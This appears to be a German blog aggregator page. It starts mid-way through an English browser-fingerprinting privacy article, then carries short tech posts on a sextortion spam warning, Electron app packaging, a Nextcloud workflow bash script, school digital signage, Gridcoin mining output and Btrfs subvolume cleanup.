Some privacy oriented people might opt for traditional privacy techniques like clearing cookies, disallowing javascript and WebRTC requests. Sadly, we would not recommend these techniques because a handful of people uses them. Your identity would, therefore, end up becoming even more unique than at first.

You should note that internet privacy identifying sites are few online. Take for instance Panopticlick which keeps a record 470,161+ data sets,

Is your browser safe against trackingIs your browser safe against tracking?

And I am Unique with a record 352, 000+ data sets.

Are you unique?Are you unique?

Note the figures are just meagre reflections of millions of daily internet users whose browsing activities are not sampled.

It therefore means, the amount of data for fingerprinting is minimal compared to the need for privacy surveillance. The data from both sites are only indicative of a measly reflection of the general population of internet users. However, large technology firms like google and facebook that own massive data centers have the potential to amass billions of private user information.

It is a fact that Facebook has a threshold of more than one billion regular visitors who at one point have provided Facebook with their private information. When such substantial data points amassed by the big firms is used to compile browser fingerprinting, the threat to personal privacy becomes real and potentially harmful.

Tips to protect your Online Browser Fingerprinting

How do you protect yourself from all these potential intrusive points to your private data?

If you opt for a unique browser that does not submit your logs, your identity becomes even more unique and clear to trace. On the other side, when you decide to go for traditional browsers, they are insecure and risky. Then what is the best alternative to protect yourself from the privacy dilemma narrative?

Yes!  You can Protect Yourself from Browser Fingerprinting.

Good privacy behavior would entail filtering between your private internet activities and public internet activities. The moment you learn how to dedicate one system for high secretive activities and another for regular activities, that’s the moment you will find yourself protected from risky data miners. You could even go to a larger extent and subscribe to an anonymity tool like Tails or Qubes. That would enable you to step up your private and public activity separation.

The following are tips to help you separate your private activities from your public activities;

  • Private internet usage should strictly not access sites that you use for your public internet browsing. For instance, logging into your twitter or facebook from a private connection or Tor browser.
  • Private internet usage should be through a different computer system, installed with a working anonymity tool or a Virtual Private Network
  • Use two separate VPNs in case you will need a VPN connection. The two VPNs should be for your private and public internet usage respectively.
  • Do not reuse usernames, email addresses and account logins that correlate between your private internet life and your public internet life.

Of course, it is possible that surveillance could point out characteristic traits of a unique user on the private internet user but would not be possible to trace that identity to the user’s public identity.

Browser Choice and Tips

The following browsers are essential when it comes to configuring your browsing environment to achieve full internet privacy.

  • Tor Browser
  • Brave Browser
  • Virtual Machines
  • Firefox browser

The above browsers require that a user sets up unique customization to help protect their identity. Therefore you should check privacy user guides for browsers that protect you from Browser Fingerprinting. Additionally, you should also opt for a good VPN with strong encryption and the ability to conceal your IP address.

Conclusion

Analyzing unique browser fingerprints is a technology in its development stages. You have an upper-hand in the direction your privacy should take.

An excellent browsing environment, for instance, firefox browsing avails a unique set of privacy features that place your private information under your control. Leveraging the above information with the kind of privacy you wish for will give you an opportunity to mitigate browser fingerprinting.

 

von Marius am 19.04.2019 14:06

11.04.2019

(thoys)

Spam von mir an mich

Zur Zeit ist ein recht fieser Spam im Umlauf. Die Mail kommt in der Regel von der eigenen Mailadresse (also oberflächlich) und beinhaltet die Erpressung, dass man bei seinen nächtlichen Onlineaktivitäten durch die Webcam gefilmt wurde und diese Aufnahmen im Falle des nicht-bezahlens veröffentlicht werden. Und so sieht er aus:

Spam

Erstens: Nicht bezahlen. Das ist Spam und kommt nicht wirklich von eurer Mailadresse. Falls doch, habt ihr ein ganz anderes Problem. Natürlich hört sich der Inhalt, gerade für öffentliche Personen, fies an, darf aber ignoriert werden.

Zweitens: Immerhin hat die Überprüfung der Bitcoins der letzten Spammail ergeben, dass noch keine Transaktionen getätigt wurden. Weiter so Vernunft.

von Timotheus am 11.04.2019 10:05

07.04.2019

Daniel Gestl (mcdaniels)

Ausrollung der Kopano Deskapp per WSUS Server (WSUS PAckage Publisher)

Hat man mehrere Clients im Einsatz, kann die Ausrollung der Kopano-Deskapp zum Verschleiß einiger Turnschuhe führen. Ich habe deshalb in

von Daniel am 07.04.2019 12:13

05.04.2019

Marco Laspe (rockiger)

Cross-plattform Apps mit Electron und React Teil 4

Nachdem wir im dritten Teil unsere Demoanwendung fertiggestellt haben, werden wir nun installierbare Pakete für die unterschiedlichen Plattformen bauen.

Stellvertretend für Linux-Systeme werden wir ein Debian Paket bauen. Für Windows werden wir ein Squirrel-Paket bauen und für Mac OS eine ZIP-Paket.

Wer seine App in die App Stores der jeweiligen Plattform bringen will, kann dies auch mit electron-forge machen.

Die Dokumentation gibt ausführlich Auskunft über die Möglichkeiten, wie man seine Pakete bauen kann und man sie auch gleichzeitig veröffentlichen kann.

Vorbereitung

In der package.json geben wir unserer Demo-App eine ordentliche Beschreibung und legen fest, dass wir für Linux nur ein Debian-Paket erstellen möchten.

Darüber hinaus geben wir Anwendungsdatei einen Namen und definieren den Pfad zum App-Icon.

"description": "Rebuild of the gtk3-demo-application with electron",
...
 "linux": [
    "deb
]
...
"electronPackagerConfig": {
  "packageManager": "yarn",
        "executableName": "electron-react-example",
        "icon": "./icon.svg"
}
...

Da unser Anwendungsname electron im Namen hat müssen wir die Abfrage für den Entwicklungsmodus ein ganz wenig anpassen. In der index.js fragen wir deswegen nicht nur, ob der Fahrt zur Anwendungsdatei electron enthält, sondern das electron ein Unterverzeichnis ist. 

const isDevMode = process.execPath.match(/[\\/]electron[\\/]/);

Nun können wir mit unserem Linux-Build anfangen.

Linux-Build

Als Icon für die Anwendung habe ich mir von openclipart.org ein einfaches Icon heruntergeladen. Grundsätzlich reicht uns hierfür jegliche SVG- oder PNG-Datei.

Für den Linux-Build legen wir in der package.json dann unter electronInstallerDebian Werte für das Icon und die Kategorie fest.

...
"electronInstallerDebian": {
        "icon": "./icon.svg",
        "categories": [
          "Utility"
        ],
        "homepage": "https://foo.com"
      },
...

Nun können wir in der Kommandozeile mit electron-forge make unsere Anwendungen bauen. Wenn alles gut gegangen ist findet man unter out/make das Debian-Paket.

Mac OS-Build

Für den Mac-Build habe ich mir in einer virtuellen Maschine das Repo geklont und unser Icon in das icns-format konvertiert.

In der Kommandozeile habe ich dann mit NPM alle Abhängigkeiten installiert und dann wieder mit electron-forge make den Build angestoßen. Mehr war nicht notwendig.

Am Ende sollte eine ZIP-Datei stehen, die eine ausführbare Anwendung enthält.

electron-forge bietet auch die Möglichkeit DMGs für den Mac zu erstellen.

Windows-Build

Als Vorbereitung für den Windows-Build habe ich unser Icon diesmal in eine ico-Datei konvertiert. Dann habe ich wieder mit electron-forge den-Build in einer virtuellen Maschine angestoßen. Mehr ist auch hier nicht nötig.

Grundsätzlich ist es auch möglich electron-Pakete mit Wine zu bauen. Allerdings ist in der aktuellen Version von electron-forge diese Funktionalitäten nicht eingebaut. Wer trotzdem unter Linux Windows-Pakete bauen will, sollte sich das Paket electron-packager einmal anschauen.

Wir haben jetzt mit geringem Aufwand Pakete für alle bekannten Plattformen gebaut. Damit endet unser Tutorial. Ich hoffe ich konnte zeigen, dass Electron mit React eine interessante Alternative ist, wenn man plattformübergreifende Desktop-Applikation bauen möchte. 

electron-react-example für Ubuntu

electron-react-example für Mac OS

electron-react-example für Window

Unsere Anwendung passt sich gut in allen Umgebungen ein, ist mit Web-Technologien umgesetzt und hat keine externen Abhängigkeiten.

Du findest den Source-Code für dieses Tutorial auf Github: https://github.com/rockiger/electron-react-example

Created with Dictandu

The post Cross-plattform Apps mit Electron und React Teil 4 appeared first on Rockiger.

von Marco am 05.04.2019 21:37

04.04.2019

Bjoern Schiessle (BeS)

The Power of Workflow Scripts

Unsplash, Malcolm Lightbody

Nextcloud has the ability to define some conditions under which external scripts are executed. The app which makes this possible is called “Workflow Script”. I always knew that this powerful tool exists, yet I never really had a use case for it. This changed last week.

Task

I heavily rely on text files for note taking. I organize them in folders, for example I have a “Projects” folders with sub-folders for each project I work on currently. Within this folders I store all notes, protocols, etc. Each of this project folders contain a “Next Steps.md”-file which contain the next steps in the project. With a growing number of projects, it become harder and harder to keep an overview over all the separated “Next Steps.md”-files. Wouldn’t it be nice to have one overview file which contain all the next steps and updates itself automatically when I change one of the individual files?

Solution

Last week I decided to sit down and write a small bash script which does exactly this:

#!/bin/bash
# call: ./createNextStepsOverview.sh -f  -o 

USER=bjoern
NEXTCLOUDDATA=/mnt/nextcloud-data
OVERVIEW_RELATIVE=/$USER/files/Notes/nextcloud/Projects/Overview.md
OVERVIEW=$NEXTCLOUDDATA$OVERVIEW_RELATIVE
PROJECTS=$NEXTCLOUDDATA/$USER/files/Notes/nextcloud/Projects
FILE=''

# Collect Next Steps from the Projects and add it to the overview file
collectNextSteps () {
    PROJECT=$(basename "$1")
    echo $'\n\n'"## $PROJECT" >> $OVERVIEW
    if [ -f "$1"/"Next Steps.md" ]; then
        tail -n +3 "$1"/"Next Steps.md" >> $OVERVIEW
    fi
}

while getopts f:o: option
do
case "${option}"
in
    f) FILE=${OPTARG};;
    o) OWNER=${OPTARG};;
esac
done

# exit when no valid file was given or owner doesn't match the expected user
if [ -z "$FILE" ] || [ "$OWNER" != "$USER" ]; then
    exit 1
fi

# we only update the overview file if the modified "Next Steps.md" was really in a projects folder
if [[ $FILE == *"Notes/nextcloud/Projects/"*"/Next Steps.md" ]]; then
    # Write headline of Overview file
    echo $'Overview\n========' > $OVERVIEW

    # collect all the next steps and write them to the overview file
    find "$PROJECTS" -maxdepth 1 -mindepth 1 -type d | while read f; do collectNextSteps "$f"; done

    # add a footer to the overview file
    echo $'\n\n' >> $OVERVIEW
    echo "Updated: " $(date)$'\n\n' >> $OVERVIEW

    # Rescan overview file
    php /var/www/nextcloud/occ files:scan --path="$OVERVIEW_RELATIVE" &> /dev/null
fi

And integrated it into my Nextcloud:

As you can see, I hand over two parameters: The path to the file which was just written, updated or deleted (-f) and the owner of the file (-o) The script then iterates over all folders in the “Projects” folder, check if there is a “Next Steps.md”-file and writes the content to the Projects/Overview.md file. After the file was written I initiate a files scan in order to update Nextcloud’s file cache.

That’s it. From now on I just have to go to the Overview.md and see directly all the next steps of all projects I’m working on.

What’s next?

At the moment I manipulate the files directly on the server. This works nicely in my case but it has some limitation, for example in case of a different primary storage it might not be possible to manipulate the files directly on the file system. I discussed the problem with the maintainer of the “Workflow Script”-App. One possible solution could be to generate a temporary app token and handing it over to the script so that files can be manipulated with regular WebDAV calls to the Nextcloud server. I will give it a try during the next days.

I also have already some more scripts in mind. For example, I have a “Archive”-folder to archive finished projects. Currently I think about a script which identifies finished projects by a tag or some keywords and moves them automatically to the archive folder.

von Björn Schießle (bjoern@schiessle.org) am 04.04.2019 22:00

03.04.2019

Stephan Tetzel (zefanja)

Open Source Digital Signage für Schulen

Digital Signage oder „Digitale Beschilderung“ bietet auch für Schulen neue Möglichkeiten. Was früher mit Aushängen an sogenannten „schwarzen Brettern“ oder Informationstafeln gelöst wurde, wird zunehmend von Monitoren übernommen. Egal ob Hinweise zu kommenden Veranstaltungen, Vertretungspläne, Raumbeschilderung oder sonstige wichtige Informationen – vieles lässt sich flexibler auf Monitoren darstellen. Aktualisierungen kann man von zentraler Stelle aus vornehmen bzw. auch automatisieren (z.B. beim Vertretungsplan). Welche Open Source Digital Signage Lösungen gibt es? Was könnten Anforderungen sein, die man als Schule hat? Ich möchte heute einige Lösungen auflisten, die in späteren Artikeln noch einmal genauer beleuchtet werden sollen.

Was sollte ein Digital Signage System können?

Die Anforderungen werden sicher von Schule zu Schule verschieden sein, aber es gibt doch ein paar wesentliche Eigenschaften, die von einer Open Source Digital Signage Lösung erfüllt sein sollten:

  • einfach zu benutzen (z.B. Editor zum Erstellen von Folien / Slides)
  • einfache und schnelle Darstellung von Bilder, Videos und anderen Dokumenten
  • zentrale Verwaltung mehrerer Monitore (am besten mit verschiedenen Gruppen / Kanälen, um verschiedene Informationen auf verschiedenen Monitoren anzeigen zu können)
  • Möglichkeiten zur Automatisierung / Zeitplan
  • möglichst kostenfrei (Lizenzen oder monatliche Gebühren)

Welche Open Source Digital Signage Lösungen gibt es?

Wenn man sich nach Open Source Digital Signage Lösungen umschaut, wird man schnell fündig. Allerdings sind viele von den sogenannten „Open Source“ Lösungen eher Freemium – Lösungen bzw. nur teilweise Open Source. Ich habe keine dieser Lösungen bisher selbst im Einsatz gehabt. In den kommenden Monaten werde ich mir aber einige dieser Lösungen anschauen, da wir als Schule noch auf der Suche nach einem passenden Digital Signage System sind.

Screenly OSE

Wenn auf Github nach Digital Signage schaut, ist Screenly OSE mit Abstand das populärste System. Screenly OSE ist für den Raspberry Pi konzipiert. Es bietet grundlegende Features, allerdings muss beim Einsatz mehrerer Geräte, jeder Raspberry Pi einzeln verwaltet werden. Die Unterschiede zur Bezahlversion sind hier aufgelistet.auch

Xibo

Direkt hinter Screenly OSE folgt Xibo, wenn man nach der Anzahl der Sterne auf Github geht. Xibo gibt es schon eine ganze Weile. Im Gegensatz zu Screenly gibt es keine Pro vs. Open Source Version, sondern alle Features sind für alle verfügbar. Xibo besteht aus einem CMS, welches man auch in einem Docker-Container installieren kann und den zugehörigen Player, die auf den Anzeigegeräten selbst installiert werden. Der Player für Windows ist kostenfrei und Open Source, für alle anderen Player müssen Lizenzgebühren bezahlt werden. Es gibt den Xibo Player für Windows, Android und webOS. Ein Player für Linux ist wohl geplant, aber noch nicht verfügbar.

Concerto

Ebenfalls schon länger am Markt ist Concerto. Concerto bietet viele Features und kann selbst gehostet werden. Technisch basiert es auf Ruby. Wenn man sich in dem Projekt auf Github etwas umschaut, scheint die Entwicklung etwas zu stocken. Dem Webinterface sieht man sein Alter auch schon etwas an. Insgesamt aber eine 100% Open Source Lösung.

LibreSignage

LibreSignage ist noch recht neue Open Source Lösung und zu 100%, Browser basiert. Es braucht also keine speziellen „Player“, sondern kann über den Browser benutzt werden. Grundlegende Features und auch Mehrbenutzerbetrieb sind vorhanden.

Foyer

Foyer ist ein WordPress-Plugin. Man kann damit verschiedene Seiten erstellen, Kanäle und verschiedene Displays diesen Kanälen zuweisen. Es ist wie LibreSignage Browser basiert und braucht deshalb keinen besonderen Player.

tabula.info

Tabula.info ist die einzige Lösung, die ich gefunden habe, die speziell für Schulen entwickelt wurde. Es bietet viele nette Features, die in man in einer Schule braucht und ist auf die Anzeige von Vertretungsplänen, HTML-Seiten und zusätzlichen Infos spezialisiert.

Weitere Lösungen

Infobeamer

Infobeamer ist nur für den privaten, nicht öffentlichen Gebrauch kostenfrei. Sonst ist wohl eine der leistungsstärksten und flexibelsten Lösungen. Die Hardware eines Raspberry Pi’s wird maximal ausgenutzt (z.B. Hardwarebeschleunigung – ein Nachteil, den alle Browser basierten Lösungen haben).

Display Monkey

Display Monkey ist ebenfalls eine Open Source Lösung, die allerdings einen Windows Server voraussetzt. Die einzelnen Displays brauchen nur einen Browser.

piSignage

Eine weitere Lösung für Digital Signage ist piSignage. Der Server ist OpenSource und kann auch selbst gehostet werden. Für die einzelnen Displays / Players müssen aber Lizenzen gekauft werden (einmalig). Wie der Name vermuten lässt, verwendet piSignage Raspberry Pi’s als Player. Der Code dafür ist nicht Open Source.

Fazit

Auf den ersten Blick gibt es scheinbar viele Open Source Lösungen. Welche kennst du noch, die hier fehlen? Mit welchem Systemen hast du gute Erfahrungen gemacht? Der Praxistest wird zeigen, welche Lösung für unsere Situation am besten geeignet ist.

2 Kommentare

Der Beitrag Open Source Digital Signage für Schulen erschien zuerst auf .:zefanjas:..

von zefanja am 03.04.2019 03:43

18.03.2019

Marius M. M. (devilx)

Hello world!

Welcome to WordPress. This is your first post. Edit or delete it, then start writing!

von Marius M. M. (devilx) (admin@devilx.net) am 18.03.2019 04:14

15.03.2019

Steffen Moeller (smoe)

BOINC (https://boinc.berkeley.edu) - das heißt Zuarbeit zu wissenschaftlichen Projekten in Form von Rechenleistung durch jedermann. Das ist toll. Und jedermann sollte mithelfen - eine zielgerechtere Spende für einen guten Zweck gibt es kaum. Da unsere Rechner (Computer) weiterhin besser werden, wir für das Browsen von Webseiten oder das Schreiben von Blog Einträgen aber kaum Rechenzeit benötigen und beinahe dauerhaft online sind, liegt diese Rechenkraft also brach. Das ist ärgerlich, denn es werden nicht nur die Rechner besser sondern auch deren Einbindung in die Wissenschaft. Einige Projekte wie die Suche nach Pulsar-Paaren und Gravitationswellen (Einstein@Home) oder ein Design neuer Eiweiße (Rosetta@Home) publizieren in den besten Journalen als Ausdruck wissenschaftlicher Exzellenz und gesellschaftlich herausragender Bedeutung. Das von IBM gesponsorte WorldCommunityGrid mit adoptierten Projekten wie FightAids@Home oder der Identifikation von Erkennungsmechanismen für Krebs weiß auch was es tut.

Es macht aber nicht jeder mit. Zum einen sind die Projekt-Präsentationen überwiegend englisch und spätestens damit außerhalb jedermanns täglicher Routine. Der Verein Rechenkraft.net (www.rechenkraft.net) hilft mit eigenen deutschsprachigen Foren und das Programm „BOINC“ selbst ist mehrsprachig. Etwas mehr Werbung für die Projekte könnte wohl auch nicht schaden. Wenn die eingesammelte Gesamt-Rechenkraft aber auch weiterhin steigt, so sinkt hingegen die Anzahl von Mitwirkenden. Der Grund hierfür liegt gerade auch an der zunehmenden Nutzung energiebewusster Laptops.  Möchte man ein Hochfahren der Lüfter vermeiden, so bietet BOINC an, dessen Rechenlast auf eine tolerierbares Maß zu senken.

Seit Jahren bei BOINC dabei, ärgert einen doch so ein wenig, nicht stattdessen bei den BitCoins mitgemacht zu haben. Nur ist deren Rechenleistung einfach nur Rechenleistung, um zu verhindern, dass ein neuer Coin zu einfach zu erstellen ist. BitCoins verbrauchen Energie ohne irgendetwas für unsere Gesellschaft zu tun. Stattdessen sollte die Rechenleistung doch lieber in BOINC fließen. Und just dieses wurde mit einer anderen Währung, dem Gridcoin, bereits vor bald 5 Jahren umgesetzt. Aus mir nicht ganz erklärlichen Gründen habe ich ihn erst jetzt für mich entdeckt und bin sehr davon angetan. Es ist sozusagen die erste Kryptowährung mit so etwas wie einem moralischen Wert. Selbst wenn sie von heute auf morgen wertlos sein sollte, so hat man bit dem Coin bereits den Gegenwert einer enormen Rechenleistung erhalten, die der Wissenschaft zugute kam.

Die Technik hinter den Gridcoins entspricht weitestgehend den BitCoins. So gibt es auch viele „online Wallets“ (Geldbörse - Programm zur Aufbewahrungsstätten für die Coins) dafür oder auch solche für das Mobiltelefon. So kann mobil bezahlt werden. Ein Transfer wird in wenigen Sekunden angezeigt ist dann binnen wenigen Minuten genügend oft bestätigt. Verschiedene Online-Börsen bieten Gridcoins zum Tausch an, allerdings bislang nur gegen BitCoins, nicht direkt gegen Bares. Ich habe zum Ausprobieren auch schon bei eBay welche gekauft. Klappt. Meine online Börse bei holytransaction.com funktioniert hervorragend. Mit solch einer Börse hat man in etwas alles, was man dann so braucht. Statt via BitCoin zu tauschen - die muss man auch erstmal haben und wir wollen die ja gerade vermeiden - zur Zeit gibt sie auch keiner her - schlage ich vor, bei ebay.de für einen kleineren Test-Betrag welche zu erstehen. Dann hat man schon etwas Gutes getan.

Möchte man selber coins minen, so bietet sich Analog zum Mining von BitCoins bietet ein Zusammenschluss von Minern zu einem Pool wie https://www.grcpool.com an. Dies sorgt für eine tägliche Zuteilung neuer Coins, während man ansonsten je nach zur Verfügung gestellter Rechenleistung einige Tage oder gar Wochen auf die Umsetzung angesparter BOINC-credits auf neue Coins warten muss. Dann gibt es zwar  entsprechend der Wartezeit mehr Coins, aber eben nicht täglich ausgezahlt. Nutzer eines pools müssen keine eigene wallet betreiben. Die online wallet kann als Auszahlungsziel angegeben werden.

Wegen der einfachen Konvertierbarkeit von Gridcoins zu BitCoins ist überall wo BitCoins akzeptiert werden sind, auch der Einkauf mit Gridcoins grundsätzlich möglich. Aber so wirklich ausgeben kann man an sich gerade kaum eine Währung. Man wird sie hierzu erst wieder in reguläres Geld tauschen wollen. Oder sammeln und sich einfach nur an schönen wissenscahftlichen Arbeiten erfreuen. Der Gridcoin ist derzeit einfach sehr günstig zu haben (chart). Oder: Es will ihn keiner. Gut daran: Eine Investition in Gridcoins kann kaum schiefgehen, schließlich kostet er ja jetzt schon nichts ;o) Ihr sollt aber nicht investieren, Ihr sollt für den guten Zweck mitrechnen und dafür den Gridcoin als Nachweis Eurer Rechenarbeit erhalten.

Bei grcpool.com gibt es nette Einführungsvideos. Denen für den Schnell-Einstieg einfach folgen. Nach zwei/drei Tagen sollten die ersten Gridcoins da sein. Die Auszahlung wird wegen der nicht-linearen Mittelung der BOINC-Zuarbeiter erst nach mehreren Tagen oder gar Wochen auf dem Höchststand sein - auch wegen zunächst noch fehlenden Bestätigung der Arbeitpakete. Auf https://www.gridcoin.us ist dies als „Pool Crunching“ beschrieben. Und wer nur einen oder zwei Rechner zur Verfügung stellen möchte, ohne ich weiter kümmern zu wollen, der sollte dies so machen.

Viel Erfolg!

Der Gridcoin ist wie auch der Bitcoin keine zentrale Einrichtung. Implementiert wird er durch den Betrieb einer Gridcoin-Geldbörse bei den ganz normalen Mitmachern. Es gibt ein paar fest verankerte Geldbörsen, mit denen sich Neueinsteiger verbinden. Und die stellen dann andere Mitwirkende vor, die die Neuen dann auch selber kennen und so weiter. Die Geldbörse gibt es als GUI Programm oder als im Hintergrund laufendes Programm für die Kommandozeile. Dieselbe Börse kann mit beiden Programmen verwaltet werden, aber immer nur mit einer der beiden zur selben Zeit. Da der Start des Programms ein wenig Zeit in Anspruch nimmt, ist für mich die Kommandozeile mit einer dauerhaft laufenden Wallet am einfachsten. Ich habe mir gar dazu einen mini-Rechner bei hetzner.de gemietet - sehr entspannend für 3 Euro/Monat - und er verdient auch brav Gridcoins mit.

Gridcoins müssen ständig neu erstellt werden, da ständig neue Rechenzeit investiert wird. Hier liegt ein wesentlicher Unterschied zu Bitcoins, die es nur endlich viele (aber immer noch sehr viele) gibt. Etwas irritierend ist, dass auch die Verwaltung bereits existierender Gridcoins mit einer Art Zins belohnt wird, dh. propotional zum eigenen Vermögen ausgestellte Zusatz-Coins in erwarteter Höhe von etwa einem 1,5%. Habe nicht verstanden, warum das so sein soll. Aber es gibt ein Gridcoin-eigenes demokratisches Abstimm-Verfahren, mit dem dann dies wohl auch abgestellt werden kann. Irgendwann. Hoffentlich.

Hier noch ein paar Dinge, die mich zu meiner Anfangszeit mit meiner eigenen wallet quälten - vielleicht hilft dies dem einen oder anderen Neu-Einsteiger. Die RSA gibt eine „Earliest Payment Time“ (Zeitpunkt frühestmöglicher Auszahlung)  an. Der liegt angeblich im Jahr 2106 - voraussichtlich nach meinem Tod. Und das, obwohl die Magnitude von 19 schon gar nicht mal so schlecht ist.

$ gridcoinresearchd rsa
[
  {
    "RSA Report": "1551915393"
  },
  {
    "CPID": „meinecpid“,
    "Earliest Payment Time": "02-07-2106 06:28:15",
    "Magnitude (Last Superblock)": 19,
    "Research Payments (14 days)": 0,
    "Daily Paid": 0,
    "Expected Earnings (14 days)": 53.2,
    "Expected Earnings (Daily)": 3.8,
    "Fulfillment %": 0,
    "CPID Lifetime Interest Paid": 0,
    "CPID Lifetime Research Paid": 0,
    "CPID Lifetime Magnitude Sum": 0,
    "CPID Lifetime Accuracy": 0,
    "CPID Lifetime Payments Per Day": -0,
    "Last Blockhash Paid": "",
    "Last Block Paid": 0,
    "Tx Count": 0
  },
  {
    "Magnitude Unit (GRC payment per Magnitude per day)": 0.2
  }
]

Das muss irgendein Artefakt sein. Etwas verlässlicher (aber immer noch konservativ) zeigte sich die mininginfo:

$ gridcoinresearchd mininginfo
{
  "blocks": 1535231,
  "stakeweight": {
    "minimum": 4,
    "maximum": 400000,
    "combined": 587644,
    "valuesum": 7345.5877693,
    "legacy": 7345.5877693
  },
  "netstakeweight": 10317152285.82833,
  "netstakingGRCvalue": 128964403.5728542,
  "staking": true,
  "mining-error": "",
  "time-to-stake_days": 26.09003472222222,
  "expectedtime": 2254179,
  "mining-version": 10,
  "mining-created": 0,
  "mining-accepted": 0,
  "mining-kernels-found": 0,
  "InterestPending": 2.40699037584004,
  "kernel-diff-best": 5.320836667567343,
  "kernel-diff-sum": 0.0001562226974061569,
  "difficulty": {
    "proof-of-stake": 6.980298925762844,
    "last-search-interval": 1551915392
  },
  "errors": "",
  "pooledtx": 0,
  "stakeinterest": 0.015,
  "testnet": false,
  "PopularNeuralHash": "54cff7d18277976540595dc72a44c",
  "NeuralPopularity": 15.06493506493507,
  "MyNeuralHash": "",
  "CPID": „meinecpid“,
  "RSAWeight": 100000,
  "Magnitude Unit": 0.2,
  "BoincRewardPending": 37.1120949,
  "MiningInfo 1": "Boinc Mining",
  "MiningInfo 2": "Poll: Fund_Creation_of_HD_Wallet_for_GridCoin",
  "MiningInfo 5": "",
  "MiningInfo 6": "",
  "MiningInfo 7": "",
  "MiningInfo 8": ""
}

Da kann man sehen, dass die „time-to-stake“, d.h. die erste Belohnung für die geleistete Rechenarbeit, bereits in 26 Tagen erwartet wird. Nach der dann kurz darauf erfolgten ersten Auszahlung (nach etwa zwei Wochen?) sah es dann so aus:

$ gridcoinreserachd rsa
[
  {
    "RSA Report": "1552000445"
  },
  {
    "CPID": „meinecpid“,
    "Earliest Payment Time": "03-07-2019 15:24:00",
    "Magnitude (Last Superblock)": 19,
    "Research Payments (14 days)": 39.61,
    "Daily Paid": 2.829285714285714,
    "Expected Earnings (14 days)": 53.2,
    "Expected Earnings (Daily)": 3.8,
    "Fulfillment %": 74.25946756655418,
    "CPID Lifetime Interest Paid": 10,
    "CPID Lifetime Research Paid": 39.61,
    "CPID Lifetime Magnitude Sum": 19,
    "CPID Lifetime Accuracy": 1,
    "CPID Lifetime Payments Per Day": 117.730365681654,
    "Last Blockhash Paid": "85b83f0d9cbbd6d6ed707b7219fcada6374d93943ed4768272243a7cffa914",
    "Last Block Paid": 1535877,
    "Tx Count": 1
  },
  {
    "Magnitude Unit (GRC payment per Magnitude per day)": 0.2
  }
]

Es ist insbesondere die earliest payment time deutlich näher gerückt. Die „Earliest Payment Time“ ist aber weiterhin unrichtig. Ich bekam inzwischen eine zweite Belohnung und das Datum blieb unverändert:

$ gridcoinresearchd mininginfo
{
  "blocks": 1536194,
  "stakeweight": {
    "minimum": 4,
    "maximum": 160000,
    "combined": 262957,
    "valuesum": 3287.00563988,
    "legacy": 3287.00563988
  },
  "netstakeweight": 6612695246.583182,
  "netstakingGRCvalue": 82658690.58228979,
  "staking": true,
  "mining-error": "",
  "time-to-stake_days": 16.62271990740741,
  "expectedtime": 1436203,
  "mining-version": 10,
  "mining-created": 1,
  "mining-accepted": 1,
  "mining-kernels-found": 1,
  "InterestPending": 0.9933265577034762,
  "kernel-diff-best": 0.1074484817591667,
  "kernel-diff-sum": 0.0001421939878357695,
  "difficulty": {
    "proof-of-stake": 7.718779402123279,
    "last-search-interval": 1552000400
  },
  "errors": "",
  "pooledtx": 0,
  "stakeinterest": 0.015,
  "testnet": false,
  "PopularNeuralHash": "",
  "NeuralPopularity": -1,
  "MyNeuralHash": "",
  "CPID": „meinecpid“,
  "RSAWeight": 0,
  "Magnitude Unit": 0.2,
  "BoincRewardPending": 0,
  "MiningInfo 1": "Boinc Mining",
  "MiningInfo 2": "Poll: Fund_Creation_of_HD_Wallet_for_GridCoin",
  "MiningInfo 5": "",
  "MiningInfo 6": "",
  "MiningInfo 7": "",
  "MiningInfo 8": ""
}




Die Gridcoin community ist sich der Unschönheiten bewusst, die ihre Werkzeuge noch haben. Dies soll besser werden.

Meine "Research Payments (14 days)" liegt aktuell bei 74.7. Für diese knappen 75 Gridcoins arbeiten bei mir mehrere Computer, zwei davon auch mit Grafikkarte, also zwei Wochen. Bei eBay kosten 65  Gridcoins ganze 1,55 Euro (EBay findet  „Griechin“ stadt „Gridcoin“, eigentlich lustig). Der Anbieter hat nach eigenen Angaben viele Grafikkarten eingespannt, was ihn sehr leistungsfähig macht, dafür kann er (technisch eingegrenzt) nicht bei allen wissenschaftlichen Fragstellungen mithelfen, jedenfalls nicht denen, die mich besonders interessieren und deswegen kaufe ich auch dort auch nicht regelmäßig. Aber abundan dann eben doch.

Ich selber hatte und habe jedenfalls meinen Spaß mit dieser mir angenehmen Währung. Und so ein cooles „GPU mining rig“ für einen guten Zweck, so wie der bei eBay, das will ich auch haben. Die eine oder andere Einsatzmöglichkeit für die eigene Bioinformatik gibt es für solch eine Technik durchaus - gerade in der Sequenzanalyse oder für das deep learning. Und man lernt mit jedem neuen Werkzeug auch etwas hinzu. Aber nun wird es erstmal Sommer. Das ist dann doch eher etwas für die Wintertage, auch zur besseren Nutzung der Abwärme.

von s (noreply@blogger.com) am 15.03.2019 23:08

02.03.2019

Christian Imhorst (immi)

Festplatte voll mit Btrfs-Subvolumes

Ich hatte eine ganze Reihe Btrfs-Subvolumes im Dateisystem von openSUSE Tumbleweed einhängen, die Platz auf der Festplatte gebraucht haben, aber im Root-Verzeichnis leer waren. Es waren vor allem Subvolumes von Docker, die den Platz beansprucht haben:

$ sudo btrfs subvolume list /
ID 257 gen 101389 top level 5 path var/tmp
[...]
ID 1599 gen 101254 top level 5 path var/lib/docker/btrfs/subvolumes/5d6eb5431d75641963973f53ab44ffbb328981d3a3781219b0224534cb17cca3
ID 1605 gen 101254 top level 5 path var/lib/docker/btrfs/subvolumes/b4adf86f01370d6b00e3e300cf75ab9d7e540b66af91d46a794f10a78c7aa7b0
ID 1607 gen 101254 top level 5 path var/lib/docker/btrfs/subvolumes/2c35776404fa91d25d4a3009055a1c98f1d8568173fca15911f2ee4989b5f511
ID 1614 gen 101254 top level 5 path var/lib/docker/btrfs/subvolumes/4bced6174066e61a9f01bf99e2d80eddb3865b6c3593b35d4609972af90987f5-init
ID 1615 gen 101254 top level 5 path var/lib/docker/btrfs/subvolumes/4bced6174066e61a9f01bf99e2d80eddb3865b6c3593b35d4609972af90987f5

[...]

Meine erste Idee, sie einfach zu löschen, hat nicht funktioniert:

$ sudo btrfs subvolume delete 
   ERROR: cannot access '': No such file or directory

Einen Ansatz, die Subvolumes zu löschen, der funktioniert, habe ich im Unix-Forum von StackExchange gefunden. Ich konnte die Subvolumes löschen, nachdem ich das ganze Btrfs-Volume komplett unter /mnt ins Dateisystem eingehangen habe:

$ sudo mount /dev/mapper/system-root /mnt/ -o subvol=/
$ ls /mnt
   .snapshots  dev   lib64  proc  selinux  tmp
